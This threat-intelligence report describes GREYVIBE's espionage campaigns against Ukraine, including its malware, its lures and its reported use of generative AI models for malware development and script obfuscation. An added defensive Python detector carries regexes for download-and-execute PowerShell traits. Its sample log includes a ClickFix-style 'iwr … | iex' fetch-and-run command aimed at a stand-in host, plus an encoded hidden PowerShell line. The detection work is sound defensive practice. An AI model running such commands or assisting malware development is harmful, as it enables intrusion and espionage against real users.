GREYVIBE Threat Actor
A previously unidentified threat actor known as GREYVIBE has been linked to a sustained cyber-espionage campaign targeting Ukraine and organizations connected to the country since at least August 2025. Analysis suggests the group operates primarily from Russian time zones and communicates in Russian. Its activities closely align with Russian state interests, particularly intelligence collection related to the ongoing Russo-Ukrainian conflict.
GREYVIBE has targeted a broad range of sectors, including military institutions, government agencies, civilian organizations, and private businesses. While the group's operations display characteristics associated with nation-state activity, evidence also indicates connections to the wider Russian cybercriminal landscape through individuals believed to be current or former cybercrime actors.
Diverse Infection Methods and Custom Malware Arsenal
The threat actor employs a variety of delivery mechanisms to compromise victims. These include highly targeted spear-phishing campaigns, deceptive CAPTCHA verification pages, and fraudulent Ukrainian-themed adult entertainment websites. Across its operations, GREYVIBE consistently relies on internally developed malware, loaders, and obfuscation tools to evade detection and maintain access to compromised systems.
Several distinct attack frameworks have been observed:
- PhantomMail distributes malicious ZIP and RAR archives through spear-phishing emails containing links to files hosted on Google Drive and 4sync. These archives include JavaScript loaders that open a decoy document while deploying PhantomRelay, a PowerShell-based remote access trojan (RAT) capable of system reconnaissance and remote command execution.
- PhantomClick leverages ClickFix-style fake CAPTCHA pages hosted on domains impersonating services such as Zoom and LAPAS. Victims are tricked into running attacker-supplied commands themselves, which start the PhantomRelay infection chain.
- PrincessClub uses counterfeit Ukrainian adult-club websites to distribute FallSpy spyware on Android devices and either PhantomRelayV1 or LegionRelay on Windows systems. Later versions of these websites incorporated WebRTC-based live-call functionality to capture victims' audio and video. FallSpy is capable of collecting sensitive information from infected Android devices, while LegionRelay supports file discovery, data theft, screenshot capture, browser credential extraction, Telegram and WhatsApp data collection, and Remote Desktop Protocol (RDP) configuration. PhantomRelayV1 expands on the original PhantomRelay by adding a custom watchdog persistence mechanism.
- DroneLink masquerades as charitable organizations supporting the Armed Forces of Ukraine and delivers WireGuard alongside LegionRelay.
- Nebo deploys a FallSpy variant disguised as a Russian-language login portal, likely intended to deceive Ukrainian military personnel into believing they are accessing a legitimate Russian military system.
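The two Windows chains above (a script loader extracted from a phishing archive that spawns PowerShell, and a ClickFix page that gets the user to paste a command into the Run dialog) leave a recognisable parent/child process trail. The detector below is an added example, not code from the report or from GREYVIBE's tooling; it runs generic heuristics over constructed Sysmon-style process-creation events. The assumptions it encodes are general Windows behaviour rather than anything the report states about GREYVIBE: archive tools extract to user-writable paths such as `%TEMP%`, a command launched from the Run dialog is a child of explorer.exe, and ClickFix lures commonly append a reassuring "I am not a robot" comment to the pasted command. All paths, hostnames and the encoded string are made up.

```python
"""Flag process-creation events matching a script-host loader or a
ClickFix Run-dialog launch. Added example with constructed events;
the heuristics are generic, not GREYVIBE-specific indicators."""
from __future__ import annotations

import json
import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line traits typical of hands-off PowerShell droppers.
PS_TRAITS = re.compile(
    r"-e[a-z]*\s+[A-Za-z0-9+/=]{20,}"        # -enc <base64 payload>
    r"|-w(?:indowstyle)?\s+hidden"           # hidden window
    r"|-nop\b|-noprofile\b"
    r"|\biex\b|invoke-expression|downloadstring|invoke-webrequest|\biwr\b",
    re.IGNORECASE,
)
# ClickFix pages often tack a comment onto the pasted command so it looks benign.
CLICKFIX_TAIL = re.compile(r"#\s*(?:i am not a robot|verification|captcha|cloudflare)", re.IGNORECASE)
# A script file passed to the script host, and a user-writable location for it
# (where archive tools extract). Logon scripts from NETLOGON will not match.
SCRIPT_ARG = re.compile(r"\S+\.(?:js|jse|wsf|vbs)\b", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(?:Temp|Downloads|Desktop|AppData)\\", re.IGNORECASE)


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path (works on any OS)."""
    return PureWindowsPath(image).name.lower()


def classify(ev: dict) -> list[str]:
    """Return the names of the rules an event matches (empty if benign)."""
    parent = basename(ev.get("ParentImage", ""))
    child = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    pcmd = ev.get("ParentCommandLine", "")
    rules: list[str] = []
    # Chain 1: wscript/cscript running a script from a user-writable path spawns a shell.
    if (parent in SCRIPT_HOSTS and child in SHELLS
            and SCRIPT_ARG.search(pcmd) and USER_WRITABLE.search(pcmd)):
        rules.append("script_host_loader_spawned_shell")
        if PS_TRAITS.search(cmd):
            rules.append("dropper_style_powershell_flags")
    # Chain 2: explorer.exe (host of the Run dialog) spawns a shell with dropper
    # traits or the comment tail that ClickFix lures append. A user opening a
    # plain console from explorer.exe has neither and is not flagged.
    if parent == "explorer.exe" and child in SHELLS and (PS_TRAITS.search(cmd) or CLICKFIX_TAIL.search(cmd)):
        rules.append("clickfix_run_dialog_pattern")
    return rules


def scan(log_text: str) -> list[dict]:
    """Parse JSON-lines process events and collect the ones that match a rule."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        rules = classify(ev)
        if rules:
            findings.append({"time": ev["UtcTime"], "image": ev["Image"], "rules": rules})
    return findings


# Constructed Sysmon-style events: a benign console, a loader from a RAR temp
# folder, a ClickFix paste, and a benign NETLOGON script. Not real telemetry.
SAMPLE_LOG = r'''
{"UtcTime": "2026-03-02 09:14:03", "ParentImage": "C:\\Windows\\explorer.exe", "ParentCommandLine": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\""}
{"UtcTime": "2026-03-02 09:21:47", "ParentImage": "C:\\Windows\\System32\\wscript.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\olena\\AppData\\Local\\Temp\\Rar$DIa1234.5678\\Invoice_2026.pdf.js\"", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"}
{"UtcTime": "2026-03-02 10:02:15", "ParentImage": "C:\\Windows\\explorer.exe", "ParentCommandLine": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -w hidden -c \"iwr http://zoom-verify.invalid/c.txt | iex\" # I am not a robot - reCAPTCHA Verification ID: 7812"}
{"UtcTime": "2026-03-02 10:30:00", "ParentImage": "C:\\Windows\\System32\\wscript.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\wscript.exe\" \\\\corp.local\\netlogon\\map_drives.vbs", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c net use H: \\\\fileserver\\home"}
'''

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["image"], ", ".join(f["rules"]))
```

Only the loader event and the ClickFix event are flagged; the NETLOGON script and the plain console are not. On a live host the ClickFix chain also leaves the pasted command in the registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth collecting alongside the process event during triage.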
Artificial Intelligence as a Force Multiplier
One of the most notable aspects of GREYVIBE's operations is its apparent reliance on generative artificial intelligence and large language models to enhance offensive capabilities. Evidence suggests the group has utilized platforms such as Ideogram AI, OpenAI ChatGPT, and Google Gemini to assist with image generation, malware development, script obfuscation, backend infrastructure creation, and post-compromise operations.
This AI-assisted approach offers several operational advantages. It helps compensate for technical skill gaps, accelerates development cycles, and reduces dependence on previously identified malware families and tools that could facilitate attribution.
The increasing use of AI within cyber operations presents a significant challenge for defenders. Threat actors can rapidly generate, modify, or replace components of their toolsets, reducing the effectiveness of traditional attribution methods that rely on stable technical indicators and recurring malware artifacts.
Operational Weaknesses Reveal Development Gaps
Despite benefiting from AI-assisted development, GREYVIBE has demonstrated multiple operational security shortcomings. Researchers identified design flaws within LegionRelay that inadvertently exposed backend functionality, providing insight into the malware's internal operations.
Such mistakes are generally uncommon among highly sophisticated state-sponsored actors, suggesting that GREYVIBE may not represent a traditional intelligence service operation. Instead, the group appears to possess low-to-moderate technical sophistication while leveraging AI technologies to enhance capabilities beyond its inherent skill level.
Indicators of Cybercriminal Connections
Multiple findings suggest that GREYVIBE maintains links to the broader Russian cybercrime ecosystem:
- Access to, or use of, an ISO-building utility with suspected links to the TrickBot gang and UAC-0098.
- Detection of PhantomRelay variants in seemingly unrelated cybercriminal campaigns: Microsoft Teams voice-phishing operations conducted between July 2025 and February 2026, and KongTuke delivery campaigns observed between February and March 2026 that used ClickFix techniques.
- Uploads of early-stage development and testing samples.
- Use of informal internet slang such as 'letsrollboyos,' 'totallyunsus,' and 'cuteuwu' in development artifact naming conventions.
- Deployment of the XMRig cryptocurrency miner on a limited number of systems infected with LegionRelay.
These indicators support a moderate-confidence assessment that GREYVIBE has meaningful ties to cybercriminal networks and a low-to-moderate confidence assessment that some members may currently be, or previously were, involved in cybercrime activities.
Blurring the Line Between State and Criminal Operations
The precise nature of GREYVIBE's relationship with the Russian state remains uncertain. Several possibilities exist, including integration of cybercriminal personnel into a state-backed organization, independent operators carrying out state-directed tasks, or the formation of a hybrid structure that combines criminal and state-affiliated elements.
As a result, GREYVIBE occupies a complex space between traditional cybercrime and government-linked cyber operations. This overlap complicates attribution efforts and highlights the increasingly blurred boundaries between financially motivated cybercriminal activity and state-sponsored intelligence operations.